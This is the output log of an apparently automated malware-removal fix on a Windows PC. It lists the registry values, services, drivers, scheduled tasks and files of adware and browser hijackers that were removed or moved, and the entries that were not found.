HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\formallyformally => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\7E2GIGOFIW => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\kelling => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\const => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\ProxyGate => value not found.
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\DP53A0YCAS => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\slisdo => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\8SI36M2PFP => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\YPCXU7XLWZ => value not found.
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Q4M50GL1YU => value not found.
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\NowUSeeIt Player => value not found.
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Interstatnogui => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\DisableCMD => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\NoDispAppearancePage => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\NoDispBackgroundPage => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\NoDispSettingsPage => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoViewOnDrive => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\DisableLocalMachineRun => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\DisableLocalMachineRunOnce => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\DisableCurrentUserRun => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\DisableCurrentUserRunOnce => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoViewContextMenu => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoShellSearchButton => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoFind => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoFile => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\HideClock => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoTrayContextMenu => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoTrayItemsDisplay => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoSetFolders => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoDevMgrUpdate => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoSetTaskbar => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoDeletePrinter => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoDFSTab => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoChangeStartMenu => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoLogoff => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoWindowsUpdate => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoEncryptOnMove => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoRunasInstallPrompt => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoResolveSearch => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoSaveSettings => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoHardwareTab => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoStartMenuSubFolders => value removed successfully
C:\Users\Robert G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\misprision.lnk => moved successfully
C:\Program Files (x86)\Ovals\fluctuations.exe => not found.
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
"HKU\S-1-5-21-3079306625-983104223-3348847558-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{B2155548-F7E4-4313-ACE1-89C26E550F10}" => key removed successfully
HKCR\CLSID\{B2155548-F7E4-4313-ACE1-89C26E550F10} => key not found. 
"HKU\S-1-5-21-3079306625-983104223-3348847558-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{CD01B6C4-A7DB-43CF-B6B5-9E5E0419DA91}" => key removed successfully
HKCR\CLSID\{CD01B6C4-A7DB-43CF-B6B5-9E5E0419DA91} => key not found. 
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9211B66D-AA1B-4BD0-bF35-65E6C6E5F23F} => key not found. 
HKCR\CLSID\{9211B66D-AA1B-4BD0-bF35-65E6C6E5F23F} => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B4F3A835-0E21-4959-BA22-42B3008E02FF}" => key removed successfully
"HKCR\CLSID\{B4F3A835-0E21-4959-BA22-42B3008E02FF}" => key removed successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=3" => key removed successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=9" => key removed successfully
Chrome HomePage => removed successfully
Chrome StartupUrls => removed successfully
Chrome DefaultSearchURL => removed successfully
Chrome DefaultSearchKeyword => removed successfully
Chrome DefaultSuggestURL => removed successfully
66d2d577efd779c3e9f6f6c2faf74956 => service not found.
Cegoe => service removed successfully
Ilaaugca => service removed successfully
KarxMhfonki => service not found.
srcsrv => service removed successfully
UnfugitiveA => service not found.
WindowService => service not found.
CHNGTSvc => service not found.
"c:\exervice.exe" => not found.
gupdate => service removed successfully
gupdatem => service removed successfully
ibtsiva => service removed successfully
meseboje => service not found.
979804fd5c15500d838ae68596384f64 => service not found.
cherimoya => Unable to stop service.
cherimoya => service removed successfully
"C:\WINDOWS\system32\drivers\979804fd5c15500d838ae68596384f64.sys" => not found.
C:\WINDOWS\System32\drivers\cherimoya.sys => moved successfully
SMUpdd => Unable to stop service.
SMUpdd => service removed successfully
"C:\Users\Robert G\AppData\Local\E5AD75FC-1482845765-9D97-579A-C454442718AE" => not found.
"C:\Program Files\Jidd" => not found.
C:\ProgramData\smp2.exe => moved successfully
C:\WINDOWS\rsrcs.dll => moved successfully
C:\WINDOWS\System32\Tasks\SMW_UpdateTask_Time_3430393839393235392d5a556c6c4a5a575750414134 => moved successfully
C:\WINDOWS\System32\Tasks\SMW_P => moved successfully
C:\WINDOWS\system32\BITBBD7.tmp => moved successfully
"C:\Users\Robert G\AppData\Roaming\JucdiJhnoz" => not found.
C:\Users\Robert G\AppData\LocalLow\Company => moved successfully
C:\Users\Robert G\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A} => moved successfully
C:\Users\Robert G\AppData\Local\Tempfolder => moved successfully
C:\Users\Robert G\AppData\Local\CrashRpt => moved successfully
C:\uninst => moved successfully
"C:\ProgramData\SearchModule" => not found.
"C:\Program Files\JiddUn" => not found.
"C:\Program Files\Common Files\Noobzo" => not found.
C:\ProgramData\d4b1e343-7d03-0 => moved successfully
"C:\WINDOWS\System32\Tasks\System Healer Task" => not found.
"C:\WINDOWS\System32\Tasks\System HealerPeriod" => not found.
"C:\WINDOWS\System32\Tasks\System HealerStartUp" => not found.
"C:\Users\Public\Desktop\Launch System Healer.lnk" => not found.
"C:\WINDOWS\Tasks\System HealerStartUp.job" => not found.
"C:\WINDOWS\Tasks\System HealerPeriod.job" => not found.
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Healer" => not found.
C:\ProgramData\d4b1e343-2e47-1 => moved successfully
"C:\Program Files (x86)\SystemHealer" => not found.
C:\xpack1221_US.1482324322.exe => moved successfully
C:\Program Files (x86)\SoftUpgrade => moved successfully
C:\WINDOWS\SysWOW64\SendRequest Error => moved successfully
C:\WINDOWS\system32\SSL => moved successfully
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Socia2Sear Browser Enhancer" => not found.
"C:\Program Files\66d2d577efd779c3e9f6f6c2faf74956" => not found.
"C:\Users\Public\Desktop\KNCTR.lnk" => not found.
C:\Users\Robert G\AppData\Local\NowUSeeItPlayer => moved successfully
C:\Users\Robert G\AppData\Local\Chromium => moved successfully
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NowUSeeIt Player" => not found.
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KNCTR" => not found.
"C:\Program Files (x86)\NowUSeeItPlayer" => not found.
"C:\Program Files (x86)\Itibiti Soft Phone" => not found.
"C:\Program Files (x86)\CleanBrowser" => not found.
"C:\Users\Robert G\AppData\Local\E5AD75FC-1482844048-9D97-579A-C454442718AE" => not found.
C:\Users\Robert G\AppData\Local\slisdo.dll => moved successfully
C:\Users\Robert G\AppData\Local\uninstallro.exe => moved successfully
"C:\WINDOWS\System32\Tasks\Update Service for Youtube AdBlock2" => not found.
"C:\WINDOWS\Tasks\Update Service for Youtube AdBlock2.job" => not found.
C:\WINDOWS\system32\BITDFC5.tmp => moved successfully
"C:\Users\Robert G\AppData\Roaming\ProxyGate" => not found.
"C:\Users\Robert G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AnonymizerGadget" => not found.
"C:\Program Files\1OZOH9DOKF" => not found.
"C:\Program Files\0DA5GV0SMZ" => not found.
"C:\Program Files (x86)\BestCleaner" => not found.
"C:\WINDOWS\System32\Tasks\Update Service for Youtube AdBlock" => not found.
"C:\WINDOWS\Tasks\Update Service for Youtube AdBlock.job" => not found.
C:\ProgramData\ntuser.pol => moved successfully
"C:\Program Files (x86)\Youtube AdBlock" => not found.
C:\Users\Robert G\Downloads\Unconfirmed 89628.crdownload => moved successfully
C:\WINDOWS\System32\Tasks\73699857 => moved successfully
C:\WINDOWS\System32\Tasks\k73699857 => moved successfully
C:\WINDOWS\System32\Tasks\18170115 => moved successfully
C:\WINDOWS\System32\Tasks\60353394 => moved successfully
C:\WINDOWS\System32\Tasks\ga7369985773699857 => moved successfully
C:\WINDOWS\System32\Tasks\gak73699857k73699857 => moved successfully
C:\WINDOWS\System32\Tasks\ga1817011518170115 => moved successfully
C:\WINDOWS\System32\Tasks\ga6035339460353394 => moved successfully
"C:\Program Files (x86)\Ovals" => not found.
"C:\Program Files (x86)\mem" => not found.
C:\Program Files (x86)\Disenfranchise => moved successfully
"C:\Users\Robert G\AppData\Roaming\ASPackage" => not found.
"C:\Program Files\AE5AV44CD6" => not found.
C:\Program Files (x86)\knockdowns => moved successfully
"C:\Program Files (x86)\E5AD75FC-1482865504-9D97-579A-C454442718AE" => not found.
"C:\Users\Robert G\AppData\Roaming\AGData" => not found.
C:\WINDOWS\System32\Tasks\src_srv => moved successfully
"C:\WINDOWS\System32\Tasks\AGProxyCheck" => not found.
"C:\Users\Robert G\AppData\Roaming\src_srv" => not found.
"C:\Program Files (x86)\AnonymizerGadget" => not found.
"C:\Program Files (x86)\Unfugitivepocson" => not found.
"C:\WINDOWS\System32\Tasks\{7D0C7D47-7A0E-7E79-0A11-087E790A110B}" => not found.
"C:\WINDOWS\System32\Tasks\One System Care Task" => not found.
"C:\WINDOWS\System32\Tasks\One System Care Monitor" => not found.
"C:\Users\Public\Desktop\Launch One System Care.lnk" => not found.
"C:\Users\Robert G\AppData\Roaming\One System Care" => not found.
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care" => not found.
C:\ProgramData\1a467d37-72a5-1 => moved successfully
C:\ProgramData\1a467d37-42f7-0 => moved successfully
"C:\Program Files (x86)\OneSystemCare" => not found.
C:\Users\Robert G\AppData\Local\fluctuations.exe => moved successfully
"C:\exervice.exe" => not found.
C:\WINDOWS\4b15ad0c9aba0f5f34b9d34c5ca543e0.exe => moved successfully
"C:\WINDOWS\system32\Drivers\979804fd5c15500d838ae68596384f64.sys" => not found.
C:\Users\Robert G\AppData\Local\328ac946-536c-4e44-8483-c0f65d99bbad.dat => moved successfully
C:\Users\Robert G\AppData\Local\7396d5af-93b3-4d36-bfec-04bbd1449761.dat => moved successfully
C:\Users\Robert G\AppData\Local\9483d08e-1f72-4d13-b956-5e490aa0f581.dat => moved successfully
C:\Users\Robert G\AppData\Local\b62f5060-8250-438a-a930-35c70e952a02.dat => moved successfully
"C:\Users\Robert G\AppData\Local\fluctuations.exe" => not found.
"C:\Users\Robert G\AppData\Local\slisdo.dll" => not found.
"C:\Users\Robert G\AppData\Local\uninstallro.exe" => not found.
"C:\ProgramData\smp2.exe" => not found.
C:\Users\Robert G\AppData\Local\Temp\12C5.tmp.exe => moved successfully
C:\Users\Robert G\AppData\Local\Temp\9S1ETRV3OH.exe => moved successfully
C:\Users\Robert G\AppData\Local\Temp\B4E9.tmp.exe => moved successfully
C:\Users\Robert G\AppData\Local\Temp\ICReinstall_B4E9.tmp.exe => moved successfully
C:\Users\Robert G\AppData\Local\Temp\sdf6733.exe => moved successfully
C:\Users\Robert G\AppData\Local\Temp\W66KQ7BR7K.exe => moved successfully
"HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}" => key removed successfully
"HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}" => key removed successfully
"HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}" => key removed successfully
"HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}" => key removed successfully
"HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}" => key removed successfully
"HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}" => key removed successfully
"HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}" => key removed successfully
"HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}" => key removed successfully
"HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}" => key removed successfully
"HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0A6D162B-2271-438A-9015-FDF86E38E3A1}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0A6D162B-2271-438A-9015-FDF86E38E3A1}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\OfficeSoftwareProtectionPlatform\SvcRestartTask" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0B0C6F63-0BD1-498A-9527-397F7F32D262}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0B0C6F63-0BD1-498A-9527-397F7F32D262}" => key removed successfully
C:\WINDOWS\System32\Tasks\gak73699857k73699857 => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\gak73699857k73699857" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{11643EA6-43A5-4B26-BCA2-B79C17E2627D} => key not found. 
C:\WINDOWS\System32\Tasks\System HealerStartUp => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\System HealerStartUp => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{136AC49D-1185-4DAF-9EED-4010A2D37876}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{136AC49D-1185-4DAF-9EED-4010A2D37876}" => key removed successfully
C:\WINDOWS\System32\Tasks\src_srv => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\src_srv" => key removed successfully
"C:\Program Files (x86)\knockdowns" => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{1990B26F-6ADF-4BD8-BA6F-799C43204F26}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1990B26F-6ADF-4BD8-BA6F-799C43204F26}" => key removed successfully
C:\WINDOWS\System32\Tasks\18170115 => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\18170115" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1CCBFDDC-4FED-4859-9EA1-176E35894E0A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1CCBFDDC-4FED-4859-9EA1-176E35894E0A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{1E7810AB-4461-4BAB-A923-725FF0121E8B}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1E7810AB-4461-4BAB-A923-725FF0121E8B}" => key removed successfully
C:\WINDOWS\System32\Tasks\73699857 => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\73699857" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{20A9A40C-98B8-4A9E-9EF4-34A0EB5D2C67} => key not found. 
C:\WINDOWS\System32\Tasks\Update Service for Youtube AdBlock => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Update Service for Youtube AdBlock => key not found. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{335F0AFA-8CF9-409A-931C-B15A49778819} => key not found. 
C:\WINDOWS\System32\Tasks\Update Service for Youtube AdBlock2 => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Update Service for Youtube AdBlock2 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4E463819-FB04-48C1-ACDA-F4F4D23C5466}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4E463819-FB04-48C1-ACDA-F4F4D23C5466}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{52AE6531-40FD-4377-BFBD-D5FBC7CEFD1A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{52AE6531-40FD-4377-BFBD-D5FBC7CEFD1A}" => key removed successfully
C:\WINDOWS\System32\Tasks\SMW_UpdateTask_Time_3430393839393235392d5a556c6c4a5a575750414134 => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SMW_UpdateTask_Time_3430393839393235392d5a556c6c4a5a575750414134" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5C8969CF-AF98-4F0F-A7DD-B1B9C5CC10B2} => key not found. 
C:\WINDOWS\System32\Tasks\System Healer Task => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\System Healer Task => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5D326864-1C1B-4B0C-98E4-8975183EBD11}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5D326864-1C1B-4B0C-98E4-8975183EBD11}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WPD\SqmUpload_S-1-5-21-3079306625-983104223-3348847558-1001" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{69CE572E-9923-4159-A330-DB1D3C2631A8}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{69CE572E-9923-4159-A330-DB1D3C2631A8}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{6EFA82CE-E47B-4B0A-AD1A-88DC8A5D6565}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6EFA82CE-E47B-4B0A-AD1A-88DC8A5D6565}" => key removed successfully
C:\WINDOWS\System32\Tasks\60353394 => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\60353394" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7115A4DA-439D-4050-9AEF-FD2E2E5A752E}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7115A4DA-439D-4050-9AEF-FD2E2E5A752E}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7B8662A0-9355-4D8A-8BFD-BEAF35343CD1}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7B8662A0-9355-4D8A-8BFD-BEAF35343CD1}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{7C02E7AF-D6DC-44AC-B6B1-3B4DDDE34DAF}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7C02E7AF-D6DC-44AC-B6B1-3B4DDDE34DAF}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{85384654-A986-4FB7-A8DA-D7761EDA3149}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{85384654-A986-4FB7-A8DA-D7761EDA3149}" => key removed successfully
C:\WINDOWS\System32\Tasks\k73699857 => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\k73699857" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{965C4FE9-DA8F-4232-8D6F-D709676DEF24}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{965C4FE9-DA8F-4232-8D6F-D709676DEF24}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{99C8DB32-949A-499C-B5D9-6042D048950D}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{99C8DB32-949A-499C-B5D9-6042D048950D}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9FFCB734-D79F-4764-8B63-4F06330E3F45} => key not found. 
C:\WINDOWS\System32\Tasks\One System Care Monitor => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\One System Care Monitor => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A06CEAA3-C663-4DD1-BE93-23D8A41E521F}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A06CEAA3-C663-4DD1-BE93-23D8A41E521F}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A18C8BED-9923-4C65-B78D-B7C168B06955}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A18C8BED-9923-4C65-B78D-B7C168B06955}" => key removed successfully
C:\WINDOWS\System32\Tasks\ga1817011518170115 => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ga1817011518170115" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A9528279-474A-4DBA-B459-B825FF0C055E} => key not found. 
C:\WINDOWS\System32\Tasks\System HealerPeriod => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\System HealerPeriod => key not found. 
